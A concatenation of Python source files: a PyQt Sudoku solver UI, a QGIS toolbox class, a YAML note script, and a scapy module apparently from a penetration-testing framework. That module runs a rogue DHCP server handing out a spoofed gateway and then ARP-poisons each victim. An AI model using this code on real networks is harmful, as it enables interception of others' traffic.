self.label_1_0.setObjectName(_fromUtf8("label_1_0"))
self.gridLayout_1.addWidget(self.label_1_0, 1, 0, 1, 1)
self.label_0_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_2.sizePolicy().hasHeightForWidth())
self.label_0_2.setSizePolicy(sizePolicy)
self.label_0_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_2.setFont(font)
self.label_0_2.setAutoFillBackground(False)
self.label_0_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_2.setFrameShape(QtGui.QFrame.Panel)
self.label_0_2.setText(_fromUtf8(""))
self.label_0_2.setTextFormat(QtCore.Qt.PlainText)
self.label_0_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_2.setObjectName(_fromUtf8("label_0_2"))
self.gridLayout_1.addWidget(self.label_0_2, 0, 2, 1, 1)
self.label_1_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_1.sizePolicy().hasHeightForWidth())
self.label_1_1.setSizePolicy(sizePolicy)
self.label_1_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_1.setFont(font)
self.label_1_1.setAutoFillBackground(False)
self.label_1_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_1.setFrameShape(QtGui.QFrame.Panel)
self.label_1_1.setText(_fromUtf8(""))
self.label_1_1.setTextFormat(QtCore.Qt.PlainText)
self.label_1_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_1.setObjectName(_fromUtf8("label_1_1"))
self.gridLayout_1.addWidget(self.label_1_1, 1, 1, 1, 1)
self.label_0_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_1.sizePolicy().hasHeightForWidth())
self.label_0_1.setSizePolicy(sizePolicy)
self.label_0_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_1.setFont(font)
self.label_0_1.setAutoFillBackground(False)
self.label_0_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_1.setFrameShape(QtGui.QFrame.Panel)
self.label_0_1.setFrameShadow(QtGui.QFrame.Plain)
self.label_0_1.setText(_fromUtf8(""))
self.label_0_1.setTextFormat(QtCore.Qt.PlainText)
self.label_0_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_1.setObjectName(_fromUtf8("label_0_1"))
self.gridLayout_1.addWidget(self.label_0_1, 0, 1, 1, 1)
self.label_1_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_2.sizePolicy().hasHeightForWidth())
self.label_1_2.setSizePolicy(sizePolicy)
self.label_1_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_2.setFont(font)
self.label_1_2.setAutoFillBackground(False)
self.label_1_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_2.setFrameShape(QtGui.QFrame.Panel)
self.label_1_2.setText(_fromUtf8(""))
self.label_1_2.setTextFormat(QtCore.Qt.PlainText)
self.label_1_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_2.setObjectName(_fromUtf8("label_1_2"))
self.gridLayout_1.addWidget(self.label_1_2, 1, 2, 1, 1)
self.label_2_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_0.sizePolicy().hasHeightForWidth())
self.label_2_0.setSizePolicy(sizePolicy)
self.label_2_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_0.setFont(font)
self.label_2_0.setAutoFillBackground(False)
self.label_2_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_0.setFrameShape(QtGui.QFrame.Panel)
self.label_2_0.setText(_fromUtf8(""))
self.label_2_0.setTextFormat(QtCore.Qt.PlainText)
self.label_2_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_0.setObjectName(_fromUtf8("label_2_0"))
self.gridLayout_1.addWidget(self.label_2_0, 2, 0, 1, 1)
self.label_2_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_1.sizePolicy().hasHeightForWidth())
self.label_2_1.setSizePolicy(sizePolicy)
self.label_2_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_1.setFont(font)
self.label_2_1.setAutoFillBackground(False)
self.label_2_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_1.setFrameShape(QtGui.QFrame.Panel)
self.label_2_1.setText(_fromUtf8(""))
self.label_2_1.setTextFormat(QtCore.Qt.PlainText)
self.label_2_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_1.setObjectName(_fromUtf8("label_2_1"))
self.gridLayout_1.addWidget(self.label_2_1, 2, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_1, 0, 0, 1, 1)
self.gridLayout_10.addLayout(self.mainGridLayout, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.widget)
self.gridLayoutSidePanel = QtGui.QGridLayout()
self.gridLayoutSidePanel.setHorizontalSpacing(0)
self.gridLayoutSidePanel.setObjectName(_fromUtf8("gridLayoutSidePanel"))
self.txtbrwSolutionbox = QtGui.QTextBrowser(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.txtbrwSolutionbox.sizePolicy().hasHeightForWidth())
self.txtbrwSolutionbox.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily(_fromUtf8("DejaVu Sans Mono"))
self.txtbrwSolutionbox.setFont(font)
self.txtbrwSolutionbox.setTabChangesFocus(True)
self.txtbrwSolutionbox.setObjectName(_fromUtf8("txtbrwSolutionbox"))
self.gridLayoutSidePanel.addWidget(self.txtbrwSolutionbox, 1, 0, 1, 2)
self.btnSave = QtGui.QPushButton(self.centralwidget)
self.btnSave.setObjectName(_fromUtf8("btnSave"))
self.gridLayoutSidePanel.addWidget(self.btnSave, 2, 0, 1, 1)
self.btnRevert = QtGui.QPushButton(self.centralwidget)
self.btnRevert.setObjectName(_fromUtf8("btnRevert"))
self.gridLayoutSidePanel.addWidget(self.btnRevert, 2, 1, 1, 1)
self.btnSolve = QtGui.QPushButton(self.centralwidget)
self.btnSolve.setObjectName(_fromUtf8("btnSolve"))
self.gridLayoutSidePanel.addWidget(self.btnSolve, 4, 1, 1, 1)
self.btnClear = QtGui.QPushButton(self.centralwidget)
self.btnClear.setObjectName(_fromUtf8("btnClear"))
self.gridLayoutSidePanel.addWidget(self.btnClear, 4, 0, 1, 1)
self.label = QtGui.QLabel(self.centralwidget)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayoutSidePanel.addWidget(self.label, 0, 0, 1, 2)
self.horizontalLayout.addLayout(self.gridLayoutSidePanel)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 805, 26))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
self.menuView = QtGui.QMenu(self.menubar)
self.menuView.setObjectName(_fromUtf8("menuView"))
self.menuHelp = QtGui.QMenu(self.menubar)
self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
self.menuSolution = QtGui.QMenu(self.menubar)
self.menuSolution.setObjectName(_fromUtf8("menuSolution"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionExit = QtGui.QAction(MainWindow)
self.actionExit.setObjectName(_fromUtf8("actionExit"))
self.actionFullscreen = QtGui.QAction(MainWindow)
self.actionFullscreen.setCheckable(True)
self.actionFullscreen.setObjectName(_fromUtf8("actionFullscreen"))
self.actionHowToUse = QtGui.QAction(MainWindow)
self.actionHowToUse.setObjectName(_fromUtf8("actionHowToUse"))
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.actionShowSolution = QtGui.QAction(MainWindow)
self.actionShowSolution.setCheckable(True)
self.actionShowSolution.setChecked(True)
self.actionShowSolution.setObjectName(_fromUtf8("actionShowSolution"))
self.menuFile.addAction(self.actionExit)
self.menuView.addAction(self.actionFullscreen)
self.menuHelp.addAction(self.actionHowToUse)
self.menuHelp.addAction(self.actionAbout)
self.menuSolution.addAction(self.actionShowSolution)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuSolution.menuAction())
self.menubar.addAction(self.menuView.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
QtCore.QObject.connect(self.actionExit, QtCore.SIGNAL(_fromUtf8("triggered()")), MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
MainWindow.setTabOrder(self.btnSave, self.btnRevert)
MainWindow.setTabOrder(self.btnRevert, self.btnClear)
MainWindow.setTabOrder(self.btnClear, self.btnSolve)
MainWindow.setTabOrder(self.btnSolve, self.txtbrwSolutionbox)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Sudoku Solver", None))
self.label_3_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.btnSave.setStatusTip(_translate("MainWindow", "Save current state of the numbers in the grid. You can revert back to the saved state using the \"Load Grid State\" button (Ctrl + S)", None))
self.btnSave.setText(_translate("MainWindow", "Save", None))
self.btnRevert.setStatusTip(_translate("MainWindow", "Load a previously saved state into the grid (Ctrl + R)", None))
self.btnRevert.setText(_translate("MainWindow", "Revert", None))
self.btnSolve.setStatusTip(_translate("MainWindow", "Solve the Sudoku Puzzle (Ctrl + l)", None))
self.btnSolve.setText(_translate("MainWindow", "Solve", None))
self.btnClear.setStatusTip(_translate("MainWindow", "Clear all the cells in the grid so that you can start a fresh puzzle (Ctrl + C)", None))
self.btnClear.setText(_translate("MainWindow", "Clear", None))
self.label.setText(_translate("MainWindow", "Solution Box -", None))
self.menuFile.setTitle(_translate("MainWindow", "&File", None))
self.menuView.setTitle(_translate("MainWindow", "&View", None))
self.menuHelp.setTitle(_translate("MainWindow", "&Help", None))
self.menuSolution.setTitle(_translate("MainWindow", "&Solution", None))
self.actionExit.setText(_translate("MainWindow", "E&xit", None))
self.actionExit.setStatusTip(_translate("MainWindow", "Close this app", None))
self.actionExit.setShortcut(_translate("MainWindow", "Ctrl+W", None))
self.actionFullscreen.setText(_translate("MainWindow", "&Fullscreen", None))
self.actionFullscreen.setStatusTip(_translate("MainWindow", "Toggle fullscreen view", None))
self.actionFullscreen.setShortcut(_translate("MainWindow", "F11", None))
self.actionHowToUse.setText(_translate("MainWindow", "How To Use?", None))
self.actionHowToUse.setStatusTip(_translate("MainWindow", "Show instructions on how to use this app", None))
self.actionHowToUse.setShortcut(_translate("MainWindow", "F1", None))
self.actionAbout.setText(_translate("MainWindow", "&About", None))
self.actionAbout.setStatusTip(_translate("MainWindow", "Show the About dialog", None))
self.actionShowSolution.setText(_translate("MainWindow", "Show solution", None))
self.actionShowSolution.setStatusTip(_translate("MainWindow", "Togge solution mode. Turning off solution makes solving slightly faster.", None))
from sudokugrid import SudokuGrid
from sudokucell import SudokuCell
| guanidene/pySudokuSolver | ui_sudoku_solver.py | Python | bsd-3-clause | 121,430 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
ToolboxAction.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4 import QtGui
class ToolboxAction(object):
def __init__(self):
# This should be true if the action should be shown even if
# there are no algorithms in the provider (for instance,
# when it is deactivated
self.showAlways = False
def setData(self, toolbox):
self.toolbox = toolbox
def getIcon(self):
return QtGui.QIcon(os.path.dirname(__file__) + '/../images/alg.png')
| mhugent/Quantum-GIS | python/plugins/processing/gui/ToolboxAction.py | Python | gpl-2.0 | 1,554 |
import util
from threading import Thread
from poison import Poison
from arp import arp
from zoption import Zoption
from scapy.all import *
class dhcp(Poison):
def __init__(self):
super(dhcp, self).__init__('DHCP Spoof')
conf.verb = 0
self.local_mac = get_if_hwaddr(conf.iface)
self.spoofed_hosts = {}
self.curr_ip = None
self.config.update({"gateway":Zoption(type = "ip",
value = None,
required = True,
display = "Spoofed gateway address"),
"net_mask":Zoption(type = "ipmask",
value = None,
required = True,
display = "Netmask to distribute IPs from"),
})
self.info = """
Set up a rogue DHCP server and hand out IP addresses.
Once an IP has been dispensed, an ARP poisoning session
will be initiated for the host. If the rogue DHCP is
shutdown with hosts, the ARP poisoning session will be
destroyed, but the victim IP addresses we handed out
will be the same. This will allow the attacker an ability
to configure an ARP poisoning session in the future if they
so choose.
ARP poisons will not appear under sessions, but will
instead be managed by the spoofed_hosts dictionary.
Configure sniffers for traffic.
"""
def initialize(self):
util.Msg("Configuring rogue DHCP server...")
self.running = True
thread = Thread(target=self.netsniff)
thread.start()
return True
def netsniff(self):
""" Packet sniffer """
sniff(prn=self.pkt_handler, store=0,
stopper=self.test_stop, stopperTimeout=3)
def pkt_handler(self, pkt):
""" Handle traffic; wait for DHCPREQ or DHCPDISC; there are two cases. Most systems, if they've
previously connected to the network, will skip the discovery stage and make a DHCP REQUEST.
We can respond with a DHCPACK and hopefully get it; if we don't, we can still ARPP the host.
New systems with DHCPDISCOVER first; in this case, we can quite easily gain control, give it
our own address, and ARPP it.
"""
gateway = self.config['gateway'].value
# is this a DHCP packet!?
if self.running and DHCP in pkt:
for opt in pkt[DHCP].options:
# if the option is a REQUEST
if type(opt) is tuple and opt[1] == 3:
fam, hw = get_if_raw_hwaddr(conf.iface)
# get the requested address
requested_addr = None
for item in pkt[DHCP].options:
if item[0] == 'requested_addr':
requested_addr = item[1]
# if the IP address is the one we've reserved for it,
# we're golden. Otherwise we need to check if the one
# they're requesting is free
if self.curr_ip != requested_addr:
if not requested_addr in self.spoofed_hosts:
# ip is free, set and use it
self.curr_ip = requested_addr
else:
# ip is in use; generate another
if self.curr_ip is None:
self.curr_ip = self.config['net_mask'].value \
.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
lease = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw)
lease /= IP(src=gateway, dst='255.255.255.255')
lease /= UDP(sport=67, dport=68)
lease /= BOOTP(op=2, chaddr=mac2str(pkt[Ether].src),
yiaddr=self.curr_ip, xid=pkt[BOOTP].xid)
lease /= DHCP(options=[('message-type', 'ack'),
('server_id', gateway),
('lease_time', 86400),
('subnet_mask', '255.255.255.0'),
('router', gateway),
('name_server', gateway),
'end'])
sendp(lease, loop=False)
util.Msg('Handed \'%s\' out to \'%s\''
% (self.curr_ip, pkt[Ether].src))
util.debug('Initializing ARP spoofing...')
tmp = arp()
victim = (self.curr_ip, getmacbyip(self.curr_ip))
target = (gateway, hw)
tmp.victim = victim
tmp.target = target
if not tmp.initialize_post_spoof() is None:
self.spoofed_hosts[self.curr_ip] = tmp
util.debug('ARP spoofing successfully configured '
'for \'%s\'' % self.curr_ip)
else:
util.Msg('ARP session unsuccessful for %s! You may not'
'be able to get in the middle of them!' % self.curr_ip)
# discover; send offer
elif type(opt) is tuple and opt[1] == 1:
fam, hw = get_if_raw_hwaddr(conf.iface)
if self.curr_ip is None:
self.curr_ip = self.config['net_mask'].value \
.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
# build and send the DHCP Offer
offer = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw)
offer /= IP(src=gateway, dst='255.255.255.255')
offer /= UDP(sport=67, dport=68)
offer /= BOOTP(op=2, chaddr=mac2str(pkt[Ether].src),
yiaddr=self.curr_ip, xid=pkt[BOOTP].xid)
offer /= DHCP(options=[('message-type', 'offer'),
('subnet_mask', '255.255.255.0'),
('lease_time', 86400),
('name_server', gateway),
('router', gateway),
'end'])
sendp(offer, loop=False)
util.Msg('Sent DHCP offer for \'%s\' to \'%s\''
% (self.curr_ip, pkt[Ether].src))
def view(self):
""" Overriden view for dumping gateway/hosts
before going into dump data mode
"""
print '\033[33m[!] Spoofed gateway: \033[32m%s\033[0m' % \
self.config['gateway'].value
print '\033[33m[!] Currently Spoofing:\033[0m'
for key in self.spoofed_hosts:
print '\t\033[32m[+] %s\033[0m' % str(self.spoofed_hosts[key].victim)
try:
self.dump_data = True
raw_input()
self.dump_data = False
except KeyboardInterrupt:
self.dump_data = False
return
def shutdown(self):
""" Shutdown DHCP server and any ARP poisons
"""
self.running = False
# shutdown arp poisons if we have any running
if len(self.spoofed_hosts.keys()) > 0:
for key in self.spoofed_hosts:
self.spoofed_hosts[key].shutdown()
util.Msg('DHCP server shutdown.')
| bacemtayeb/Tierra | src/modules/poison/dhcp.py | Python | gpl-3.0 | 8,157 |
#!/usr/bin/env python
# cmy:- c-mee
# DUMP your thoughts and CLEAR your mind using c-mee.
# Version : v1-beta
# email:- cmy.project.mail@gmail.com
# cmy is short form of Clear Mind YAML
import yaml
import datetime
import os
import sys
import io
from pathlib import Path
# Create the yaml file, if it does not exist.
def create_yaml_file(cmy_dir, now):
if not os.path.exists(cmy_dir):
os.makedirs(cmy_dir)
yaml_file = yaml_fp_creator(cmy_dir, now)
if not os.path.exists(yaml_file):
yaml_data_dict = first_log_entry(now)
yaml_data_final = yaml_printer(yaml_data_dict)
with open(yaml_file, 'w') as yaml_fd:
yaml_fd.write(yaml_data_final)
# Common function for writing the final data to YAML file.
def write_yaml_file(yaml_file, yaml_data_final):
with open(yaml_file,'w') as yaml_fd:
yaml_fd.write(yaml_data_final)
# Common function for creating full path to current YAML file
def yaml_fp_creator(cmy_dir, now):
yaml_file = cmy_dir+"/"+now[2]+"_"+now[3]+".yaml"
return yaml_file
# Generate time and date fileds.
def ttmy():
now = datetime.datetime.now()
month = now.strftime("%b").upper()
day_of_the_month = now.strftime("%d")
day_of_the_week = now.strftime("%a").upper()
# time = 1315
time = now.strftime("%H%M")
# today = 24_JUN_FRI
today = day_of_the_month+"_"+month+"_"+day_of_the_week
# year = 2016
year = now.strftime('%G')
return time, today, month, year
# Common function for reading the contents in YAML.
def read_yaml_file(yaml_file):
try:
yaml_fd = open(yaml_file, 'r')
yaml_raw_data = yaml.load(yaml_fd) or {}
except IOError:
print "Error opening cmy.conf."
sys.exit()
return yaml_raw_data
# list command function
def list_cmd(args, cmy_dir, now):
#print args
yaml_file = yaml_fp_creator(cmy_dir, now)
yaml_raw_data = read_yaml_file(yaml_file)
if (len(args) > 2):
if args[2] == "today":
log_today = now[1]
yaml_raw_data = yaml_raw_data[log_today]
yaml_data_final = yaml_printer(yaml_raw_data)
print now[1]+":"
return yaml_data_final
else:
